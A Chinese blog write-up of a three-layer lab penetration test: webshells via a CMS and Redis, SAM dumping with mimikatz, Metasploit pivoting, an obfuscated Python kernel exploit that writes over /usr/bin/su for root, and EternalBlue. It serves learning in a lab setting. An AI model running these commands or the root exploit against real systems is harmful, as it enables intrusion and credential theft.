无境三层综合渗透 wp

本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记

前文链接

  1. WAMP/DVWA/sqli-labs 搭建
  2. burpsuite工具抓包及Intruder暴力破解的使用
  3. 目录扫描,请求重发,漏洞扫描等工具的使用
  4. 网站信息收集及nmap的下载使用
  5. SQL注入(1)——了解成因和手工注入方法
  6. SQL注入(2)——各种注入
  7. SQL注入(3)——SQLMAP
  8. SQL注入(4)——实战SQL注入拿webshell
  9. Vulnhub靶机渗透之Me and My Girlfriend
  10. XSS漏洞
  11. 文件上传漏洞
  12. 文件上传绕过
  13. 文件包含漏洞
  14. Vulnhub靶机渗透之zico2
  15. 命令执行漏洞
  16. 逻辑漏洞(越权访问和支付漏洞)
  17. 网站后台安全
  18. weevely的使用及免杀(Linux中的菜刀)
  19. MSF(1)——一次完整的渗透流程
  20. WebShell命令执行限制(解决方案)
  21. 记一次艰难的SQL注入(过安全狗)
  22. MSF(2)——各种木马的生成及简单的免杀
  23. MSF(3)——apk和exe的加马(过360、火绒)
  24. 通过Frp解决实现内网穿透
  25. 改造冰蝎马,实现免杀之default_aes php
  26. 记一次简单的对盗号网站的渗透
  27. 记一次幸运的漏洞挖掘
  28. 记一次从外网打通AWS云
  29. 内网渗透初探
  30. 记对外国某服务器的内网渗透
  31. 一次丝滑的内网渗透拿下域控
  32. 实战内网PTH上线域控
  33. 通过路由器进行内网渗透
  34. 钓鱼邮件和钓鱼样本
  35. 无境vulntarget-a wp
  36. 无境ZeroLogon 练习 wp

一层Win2016

WebShell

目标IP:192.168.111.20
nmap快速扫全端口

nmap -p- -T4 --min-rate 2000 -n -Pn 192.168.111.20

在这里插入图片描述
8080的web,部署了一个织梦CMS
在这里插入图片描述
访问后台地址/dede,用弱口令 admin / admin直接登录
在这里插入图片描述
在文件管理功能处直接写webshell
在这里插入图片描述
成功getshell
在这里插入图片描述
SYSTEM权限的win2016

抓密码

我们是高权限用户,可以直接把SAM导出来,然后在本地读取解密

reg save HKLM\SAM sam.hive
reg save HKLM\SYSTEM system.hive

在这里插入图片描述
然后用mimikatz解密

privilege::debug
lsadump::sam /system:system.hive /sam:sam.hive

在这里插入图片描述
得到Administrator的hash为:

ae974876d974abd805a989ebead86846

在线解密得到密码为:
P@ssw0rd1

横向

ipconfig发现存在192.168.52.0/24
在这里插入图片描述

一级代理

先手动开个rdp

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

然后直接登录
在这里插入图片描述
关个防火墙

netsh advfirewall set allprofiles state off

然后用msfvemon生成一个bind_tcp的马

msfvenom -p windows/x64/meterpreter/bind_tcp lport=6666 -f exe > 1.exe

msfconsole这样配置

use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set RHOST 192.168.111.20
set LPORT 6666
run

然后运行生成的1.exe即可得到meterpreter
在这里插入图片描述
用autoroute创建一级代理

run post/multi/manage/autoroute SUBNET=192.168.52.0 NETMASK=255.255.255.0

在这里插入图片描述
然后background回到msfconsole,用auxiliary/server/socks_proxy来搭建socks5代理

use auxiliary/server/socks_proxy
set VERSION 5
set SRVHOST 0.0.0.0
set SRVPORT 1080 
run

然后按常规方案配置socks5代理即可,代理IP写Linux的IP。我这里使用Proxifier配置
在这里插入图片描述

信息收集

直接上fscan扫描

fscanPlus_amd64.exe -h 192.168.52.0/24

存在IP192.168.52.4,并且存在nacos漏洞。
在这里插入图片描述
还有redis服务:
在这里插入图片描述
80端口还跑了一个web服务
在这里插入图片描述

访问8848端口看到nacos
在这里插入图片描述

二层Ubuntu

WebShell

NacosExploitGUI直接一把唆
在这里插入图片描述
用新建的账户登录
在这里插入图片描述
发现flag
在这里插入图片描述
flag为:

flag{7b4b73d7e9ef1c5959efbb820de2495e}

提交发现flag是错的。继续看其他的配置文件
在这里插入图片描述
发现密码P@ssw0rd_sec,尝试使用此密码登录ssh,失败。
登录redis成功
在这里插入图片描述
80端口web服务是一个空页面
在这里插入图片描述
测试常见路径phpinfo.php,看到phpinfo页,得到绝对路径为: /var/www/html
在这里插入图片描述
使用redis写webshell

CONFIG SET dir "/var/www/html/"
CONFIG SET dbfilename "2.php"
SET webshell "<?php @eval($_REQUEST['1']);?>"
SAVE

在这里插入图片描述

成功getshell
在这里插入图片描述
在这里插入图片描述
www-data权限的Ubuntu

提权

使用msfvemon生成一个Linux的bind_tcp

msfvenom -p linux/x64/meterpreter/bind_tcp lport=6666 -f elf > 1.elf

msfconsole这样配置:

use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set RHOST 192.168.52.4
set LPORT 6666
run

传上去执行获取到meterpreter
在这里插入图片描述
shell进入交互shell
在这里插入图片描述
直接使用copyfail提权,先准备好copyfail的提权payload

#!/usr/bin/env python3
import os as g,zlib,socket as s
def d(x):return bytes.fromhex(x)
def c(f,t,c):
 a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
 try:u.recv(8+t)
 except:0
f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):c(f,i,e[i:i+4]);i+=4
g.system("su")

保存在1.py中
在这里插入图片描述
执行

python3 1.py

成功提权到root权限
在这里插入图片描述
上一个交互shell

python3 -c "import pty;pty.spawn('/bin/bash')"

在这里插入图片描述

横向

ip a发现第三个网段192.168.37.0/24
在这里插入图片描述
传个fscan扫描

./fscan -h 192.168.37.0/24

在这里插入图片描述
发现新设备:192.168.37.6,并且存在MS17-010漏洞

二级代理

run post/multi/manage/autoroute SUBNET=192.168.37.0 NETMASK=255.255.255.0

在这里插入图片描述
再去Proxifier上配一下就行了
在这里插入图片描述
可以用nc测试代理是否可用

ncat -zv 192.168.37.6 445

445端口可通即为代理可用

在这里插入图片描述

三层Win7

用msf直接打

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.37.6
set payload windows/x64/meterpreter/bind_tcp
set LPORT 9999
run

一大段输出后就成功拿到了meterpreter
在这里插入图片描述
直接读flag

cat C:/Users/pro/Desktop/flag.txt

在这里插入图片描述
得到flag为:

flag{9dedc7f251eb6f0c1b7bd779bb799d34}
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值